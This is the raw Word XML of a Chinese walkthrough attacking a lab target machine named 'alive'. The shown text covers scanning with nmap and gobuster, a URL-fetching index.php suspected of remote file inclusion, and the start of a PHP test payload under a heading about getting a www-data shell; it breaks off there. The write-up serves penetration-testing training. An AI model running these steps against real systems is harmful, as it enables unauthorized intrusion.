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6CB1FE0E" w:rsidR="00AD4BDD" w:rsidRPr="00D261D7" w:rsidRDefault="0033221F" w:rsidP="00C8379B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live</w:t>
      </w:r>
      <w:r w:rsidR="0094090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攻击流程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Ref173153755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  <w:bookmarkEnd w:id="0"/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2753A2C6" w14:textId="626D2FF7" w:rsidR="002703BA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</w:t>
      </w:r>
      <w:r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>245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</w:t>
      </w:r>
      <w:r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>245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r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>alive</w:t>
      </w:r>
      <w:r w:rsidR="005A3A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶机。</w:t>
      </w:r>
      <w:r w:rsidR="004769BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r w:rsidR="004769BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表扫描本地网络</w:t>
      </w:r>
      <w:r w:rsidR="006655E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006655E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r w:rsidR="006655E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>指定扫描的网卡。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1219E50E" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="0033221F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1164EAB" wp14:editId="3E5E68E5">
            <wp:extent cx="5274310" cy="2140585"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="208219555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5551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897" w14:textId="27BB3248" w:rsidR="0033221F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626F49" w14:textId="559BE1C9" w:rsidR="005A3A6C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为什么直接锁定到了靶机？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0939A6A5" w14:textId="11986157" w:rsidR="004F0474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这里我们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已知</w:t>
      </w:r>
      <w:r w:rsidR="0033221F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live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是有漏洞的需要进行攻击</w:t>
      </w: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实际上</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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-scan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在此只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起到了查找</w:t>
      </w:r>
      <w:r w:rsidR="0033221F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live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网络</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ip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作用。在实际攻击场景中，我们并不清除哪个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有漏洞，因此每个</w:t>
      </w:r>
      <w:r w:rsidR="00133DAF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探测到的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" w:name="_Ref172016564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  <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0303F7E2" w14:textId="0F0C1EC3" w:rsidR="0080068B" w:rsidRDefault="00BC1A65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对</w:t>
      </w:r>
      <w:r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>alive</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(192.168.6.</w:t>
      </w:r>
      <w:r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>245</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0071739C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进行端口扫描</w:t>
      </w:r>
      <w:r w:rsidR="008747A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="008747A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-s</w:t>
      </w:r>
      <w:r w:rsidR="008747A1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can</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>S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YN</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>扫描模式</w:t>
      </w:r>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表不进行主机发现，</w:t>
      </w:r>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-p-</w:t>
      </w:r>
      <w:r w:rsidR="008B3146">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代表扫描所有端口</w:t>
      </w:r>
      <w:r w:rsidR="00F015EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00950F3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现开放着</w:t>
      </w:r>
      <w:r w:rsidR="0045685D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="0045685D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008E7702">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r w:rsidR="00950F3E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D475C00" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="0033221F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747F1615" wp14:editId="1B7A84EC">
            <wp:extent cx="5274310" cy="1789430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="4755730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3059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D825" w14:textId="7637EAE7" w:rsidR="0033221F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4962F5B" w14:textId="405A7A1E" w:rsidR="00950F3E" w:rsidRPr="00950F3E" w:rsidRDefault="00950F3E" w:rsidP="00950F3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" w:name="_Ref173153715"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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eb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路径扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="10555401" w14:textId="349F62B7" w:rsidR="0033221F" w:rsidRDefault="0038424D" w:rsidP="006B5186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命令行输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0033221F" w:rsidRPr="0033221F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33221F" w:rsidRPr="0033221F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33221F" w:rsidRPr="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0033221F" w:rsidRPr="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://192.168.6.245/ -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0033221F" w:rsidRPr="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0033221F" w:rsidRPr="0033221F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33221F" w:rsidRPr="0033221F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33221F" w:rsidRPr="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/wordlists/directory-list-2.3-medium.txt -x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0033221F" w:rsidRPr="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>jpg,txt,zip,bak,html,ph</w:t>
      </w:r>
      <w:r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB5470">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r w:rsidR="00CF78ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问成功路径</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF78ED"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 w:rsidR="00CF78ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>重定向路径</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0033221F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33221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，打开浏览器，</w:t>
      </w:r>
      <w:r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f12</w:t>
      </w:r>
      <w:r w:rsidR="0033221F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打开开发者模式，</w:t>
      </w:r>
      <w:r w:rsidR="00CF78ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00CF78ED" w:rsidRPr="00F23AAB">
          <w:rPr>
            <w:rStyle w:val="af6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.6.245/</w:t>
        </w:r>
        <w:r w:rsidR="00CF78ED" w:rsidRPr="00F23AAB">
          <w:rPr>
            <w:rStyle w:val="af6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>index.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CF78ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText>HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidR="006B5186" w:rsidRPr="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText>http://192.168.6.245/tmp/</w:instrText>
      </w:r>
      <w:r w:rsidR="006B5186" w:rsidRPr="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText>。其中</w:instrText>
      </w:r>
      <w:r w:rsidR="006B5186" w:rsidRPr="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText>index.php</w:instrText>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText>要求输入一个</w:instrText>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText>URL"</w:instrText>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006B5186" w:rsidRPr="00F23AAB">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.6.245/tmp/</w:t>
      </w:r>
      <w:r w:rsidR="006B5186" w:rsidRPr="00F23AAB">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。其中</w:t>
      </w:r>
      <w:r w:rsidR="006B5186" w:rsidRPr="00F23AAB">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:r w:rsidR="006B5186" w:rsidRPr="00F23AAB">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>要求输入一个</w:t>
      </w:r>
      <w:r w:rsidR="006B5186" w:rsidRPr="00F23AAB">
        <w:rPr>
          <w:rStyle w:val="af6"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>以实现跳转，例如输入</w:t>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>google.com</w:t>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，会将</w:t>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>google</w:t>
      </w:r>
      <w:r w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>搜索引擎的主页面渲染到本页面，而</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B5186"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 w:rsidR="006B5186">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是一个空的目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4F6B4" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="0033221F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64B8137" wp14:editId="0C7C678E">
            <wp:extent cx="5274310" cy="1996440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="14752094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9450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BC0" w14:textId="306B180D" w:rsidR="0033221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5F329DE" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00CF78ED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24D8D6B3" wp14:editId="72070C9E">
            <wp:extent cx="5274310" cy="1813560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10039433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3327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3B4" w14:textId="30A91743" w:rsidR="00CF78ED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F3C507B" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="006B5186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61500C1" wp14:editId="28DD19D6">
            <wp:extent cx="5274310" cy="2626360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="592671836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1836" name="图片 1" descr="图形用户界面, 网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2E69" w14:textId="02835674" w:rsidR="006B5186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1DC5921B" w14:textId="77777777" w:rsidR="00E95DF6" w:rsidRDefault="00CF78ED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F0E4212" wp14:editId="57D086B7">
            <wp:extent cx="5274310" cy="2145665"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="145890722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7221" name="图片 1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5A31" w14:textId="18BDE03B" w:rsidR="0033221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BCBDC09" w14:textId="1B8752B5" w:rsidR="006B5186" w:rsidRPr="006B5186" w:rsidRDefault="00BE13A6" w:rsidP="006B5186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 w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE13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施攻击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-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r w:rsidR="00440B5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www-data shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7817AAFC" w14:textId="59AD8D2E" w:rsidR="00E20024" w:rsidRDefault="006B5186" w:rsidP="009E153C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于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可以将外部网页渲染到本地，因此可能存在文件包含。</w:t>
      </w:r>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidR="00C87358" w:rsidRPr="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>echo "&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C87358" w:rsidRPr="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C87358" w:rsidRPr="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r w:rsidR="00C87358" w:rsidRPr="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('test'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C87358" w:rsidRPr="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>);?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C87358" w:rsidRPr="00C87358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;" &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
